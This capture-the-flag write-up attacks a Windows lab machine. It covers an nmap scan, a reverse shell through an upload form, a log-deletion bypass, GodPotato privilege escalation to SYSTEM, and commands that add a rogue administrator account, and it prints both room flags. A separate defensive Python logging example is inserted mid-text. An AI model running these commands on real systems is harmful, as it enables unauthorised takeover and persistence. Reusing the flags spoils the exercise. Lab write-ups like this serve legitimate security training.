Use your evasion skills to pwn a Windows target with an updated defence mechanism. Are you stealthy enough to evade all the updated security measures of the target?
┌──(kali㉿kali)-[~]
└─$ nmap -T4 --min-rate 1000 -sC -sV -p- -Pn stealth.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 03:07 EST
Nmap scan report for stealth.thm (10.10.19.123)
Host is up (0.15s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HOSTEVASION
| NetBIOS_Domain_Name: HOSTEVASION
| NetBIOS_Computer_Name: HOSTEVASION
| DNS_Domain_Name: HostEvasion
| DNS_Computer_Name: HostEvasion
| Product_Version: 10.0.17763
|_ System_Time: 2024-01-04T08:13:43+00:00
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2024-01-03T07:32:29
|_Not valid after: 2024-07-04T07:32:29
|_ssl-date: 2024-01-04T08:14:23+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
| tls-alpn:
|_ http/1.1
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: Host: www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-04T08:13:44
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 430.88 seconds
Upon visiting the page on port 8080 we get a file upload form. It states that it is a PowerShell Script Analyser, along with some details on what files we can upload.
Initial Access
Let's try to get a reverse shell with this if possible.
I found this reverse shell script to work. Make sure to change the IP address and port number.
Set up a listener on the specified port.
We have a reverse shell.
We have something called encodedflag on the desktop. It looks to be base64 encoded. We can decode it and see what it gives us.
┌──(kali㉿kali)-[~]
└─$ echo "WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDov
LzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5w
aHA=" | base64 -d
You can get the flag by visiting the link http://<IP_OF_THIS_PC>:8000/asdasdadasdjakjdnsdfsdfs.php
Decoding it gives us a link for the flag.
Unfortunately, no flag yet: the page tells us that a log file is present. Upon further inspection:
SHELL> dir
Directory: C:\Users\evader\documents\task
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/4/2023 2:13 PM 3114 file.ps1
-a---- 8/29/2023 3:06 PM 71 log.txt
SHELL> cat file.ps1
$FolderPath = "C:\xampp\htdocs\uploads\"
$FileDictionary = @{}
# Populate the initial state of the dictionary with file names and timestamps
$Files = Get-ChildItem -Path $FolderPath
foreach ($file in $Files) {
$FileDictionary[$file.Name] = $file.LastWriteTime
}
# Watch for changes in the directory
while ($true) {
.
.
.
# Check if the file is executable, a PowerShell script, or a pdf document
$extension = $file.Extension.ToLower()
if ($extension -eq ".ps1") {
$scriptPath = "C:\xampp\htdocs\uploads\$($file.Name)"
.
.
.
$scriptPath = "C:\xampp\htdocs\uploads\$($file.Name)"
SHELL> dir
Directory: C:\Users\evader\documents\task
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/4/2023 2:13 PM 3114 file.ps1
-a---- 8/29/2023 3:06 PM 71 log.txt
SHELL> cat log.txt
File log.txt has been modified.
File vulnerable.ps1 has been modified.
SHELL>
The contents of file.ps1, located in the C:\Users\evader\Documents\Task folder, indicate that there is a log file present in C:\xampp\htdocs\uploads.
Removing the log.txt file and then accessing the earlier link gives us the first flag.
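As an added defensive example (not the room's file.ps1 and not code from the author), here is the same polling watcher in Python, but with a hash-chained log whose head the watcher keeps in memory, so that deleting or editing log.txt, the step the flag check above relies on, is detectable. All function and class names are assumptions, and the scenario in demo() is constructed.

```python
import hashlib
import tempfile
from pathlib import Path
# Hypothetical names; mirrors the page's file.ps1 polling loop, with a tamper-evident log.

def snapshot(folder):
    """Name -> last-write time, like $FileDictionary in file.ps1."""
    return {p.name: p.stat().st_mtime_ns for p in Path(folder).iterdir() if p.is_file()}

def diff_snapshots(before, after):
    """Sorted (event, name) pairs for created, modified and deleted files."""
    events = [("created", n) for n in after if n not in before]
    events += [("modified", n) for n in after if n in before and before[n] != after[n]]
    events += [("deleted", n) for n in before if n not in after]
    return sorted(events)

class HashChainLog:
    """Each line commits to the previous digest; the watcher keeps the latest digest
    (head) in memory, so an on-disk log that was removed or edited no longer verifies."""
    def __init__(self):
        self.lines, self.head = [], "0" * 64
    def append(self, msg):
        self.head = hashlib.sha256((self.head + msg).encode()).hexdigest()
        self.lines.append(f"{self.head} {msg}")
    @staticmethod
    def verify(lines, expected_head):
        prev = "0" * 64
        for line in lines:
            digest, _, msg = line.partition(" ")
            if hashlib.sha256((prev + msg).encode()).hexdigest() != digest:
                return False  # a line was altered or the chain was broken
            prev = digest
        return prev == expected_head  # False if lines were deleted or truncated

def watch_once(folder, before, log):
    """One iteration of the while($true) loop: record every change in the uploads folder."""
    after = snapshot(folder)
    for event, name in diff_snapshots(before, after):
        log.append(f"File {name} has been {event}.")
    return after

def demo():
    """Constructed scenario: vulnerable.ps1 is uploaded, then log.txt is wiped."""
    folder, log = Path(tempfile.mkdtemp()), HashChainLog()
    (folder / "vulnerable.ps1").write_text("whoami")  # the constructed upload
    watch_once(folder, {}, log)
    intact = HashChainLog.verify(list(log.lines), log.head)  # log.txt untouched
    wiped = HashChainLog.verify([], log.head)  # log.txt removed, as in the room
    return log.lines[-1].split(" ", 1)[1], intact, wiped
```

The in-memory head (or a copy shipped off-host) is what makes the deletion visible; a plain log.txt in a folder the web server user can write to is only as trustworthy as that user.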
Privilege Escalation
After some research and trial and error, PayloadsAllTheThings on GitHub led me to another repository for privilege escalation.
We can use this to check for ways to escalate privileges. Set up a Python server and upload the file.
We can see that XAMPP is flagged as highly vulnerable and that it runs as the evader user, which we already have access to via the reverse shell.
We can try a simple PHP webshell and access it via the browser to check for more info.
Once the webshell is uploaded, we access it via the browser.
As you can see, this gives us more info.
The user has SeImpersonatePrivilege enabled, which can be abused for privilege escalation. We can use GodPotato for this.
After uploading the file to C:\xampp\htdocs, we use the program's built-in CLSID for privilege escalation and execute a simple command (here the output file is potato.exe):
potato.exe -cmd "cmd /c whoami"
This shows that we are running as NT AUTHORITY\SYSTEM, the Windows equivalent of root.
We can replace the whoami command with dir C:\Users\Administrator\Desktop to check for a flag on the Administrator's desktop.
We find a flag there; type C:\Users\Administrator\Desktop\flag.txt displays it.
We can also add a user to the Administrators group, log in via RDP and access the flag. net localgroup does not take a password, so the account is created first with net user and then added to the group:
net user <#username#> <#password#> /add
net localgroup administrators <#username#> /add
potato.exe -cmd "cmd /c net user <#username#> <#password#> /add"
potato.exe -cmd "cmd /c net localgroup administrators <#username#> /add"
What is the content of the user level flag?
THM{1010_EVASION_LOCAL_USER}
What is the content of the root level flag?
THM{101011_ADMIN_ACCESS}